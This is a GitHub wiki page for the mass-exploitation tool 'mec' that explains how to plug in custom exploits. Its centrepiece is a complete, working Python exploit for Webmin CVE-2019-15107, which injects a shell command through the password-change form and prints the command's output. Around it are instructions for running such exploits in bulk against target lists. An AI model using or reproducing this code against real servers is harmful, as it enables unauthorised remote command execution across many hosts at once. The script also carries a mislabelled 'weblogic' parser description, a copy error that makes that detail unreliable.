-
-
Notifications
You must be signed in to change notification settings - Fork 154
Custom Exploits
ls ./exploits/your-custom-exploit/
your-exploit-executable your-other-files
#!/usr/bin/python3
# pylint: disable=invalid-name, line-too-long, import-error, no-member, missing-docstring, broad-except
'''
webmin_CVE_2019_15107
'''
import argparse
import re
import sys
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
def CVE_2019_15107(url, cmd):
'''
exp
'''
vuln_url = url + "/password_change.cgi"
headers = {
'Accept-Encoding': "gzip, deflate",
'Accept': "*/*",
'Accept-Language': "en",
'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
'Connection': "close",
'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
'Referer': "%s/session_login.cgi" % url,
'Content-Type': "application/x-www-form-urlencoded",
'Content-Length': "60",
'cache-control': "no-cache"
}
payload = "user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
r = requests.post(url=vuln_url, headers=headers,
data=payload, verify=False)
if r.status_code == 200 and "The current password is " in r.text:
print(("\nvuln_url= %s" % vuln_url))
m = re.compile(
r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
cmd_result = m.findall(r.content)[0]
print()
print(("Command Result = %s" % cmd_result))
else:
print("No Vuln Exist!")
parser = argparse.ArgumentParser(description='weblogic_cve-2017-10271')
parser.add_argument('-c', type=str, required=True,
help='command to execute on the target')
parser.add_argument('-t', type=str, required=True,
help='target url')
args = parser.parse_args()
try:
CMD = args.c
URL = "http://"+args.t
CVE_2019_15107(URL, CMD)
except (KeyboardInterrupt, EOFError, SystemExit):
sys.exit(0)
In this demo, you can see that mec simply passes target_ip
as the last argument
parser.add_argument('-t', type=str, required=True,
help='target url')
Note that mec
passes -t <target>
to your exploit, so when your exploit gets executed by mec
, its command line argument looks like:
./exploit <custom args> -t <target ip>
.
├── conf
│ ├── censys.conf
│ └── zoomeye.conf
├── data
│ ├── ip_list.txt
│ ├── proxy.conf
│ ├── ss.json
│ └── zoomeye-login.action.txt
├── exploits
│ ├── ssh-bruteforce
│ ├── test
│ ├── weblogic
│ ├── webmin
│ └── witbe
├── install.py
├── lib
│ ├── cli
│ ├── __init__.py
│ ├── __pycache__
│ └── tools
├── LICENSE
├── mec
├── mec.py
├── output
│ └── result.txt
├── README.md
├── requirements.txt
├── screenshot
│ ├── main.jpg
│ └── zoomeye.jpg
└── tools
├── geckodriver
└── ss-proxy
Your custom exploits live under ./exploits
, just like any built-in ones.
Take a look at test
exploit:
├── ssh-bruteforce
│ └── ssh_bruteforce.py
├── test
│ └── test
├── weblogic
│ └── weblogic_cve-2017-10271.py
├── webmin
│ └── webmin.py
└── witbe
└── witbe.py
./exploit/test/test
is the exploit, you can view all available exploits by issuing exploits
command in mec:
Remember to chmod +x <your exploit>
, otherwise it won't be recognized
mec > exploits
[+] Available exploits:
webmin/webmin.py
test/test
witbe/witbe.py
weblogic/weblogic_cve-2017-10271.py
ssh-bruteforce/ssh_bruteforce.py
mec enters target exploit's directory before launching a mass-exploit job, thus relative paths are allowed, custom exploit's root directory won't change when being used by mec
Your exploit can be either a binary file or a script, as long as you chmod +x
them first. Before launching a mass-exploit job, you will see a warning reminding you how your exploit is going to be executed:
[!] DEBUG: ['./ssh_bruteforce.py', '/tmp/1', 'id', '-t']
Working in /home/u/.mec/exploits/ssh-bruteforce
[?] Proceed? [y/n]
- If you have any issues, please report them to https://github.com/jm33-m0/mec/issues
- Open a pull request when you have fixed any bugs or added any features
- I would appreciate you adding your own adapted exploits to this repo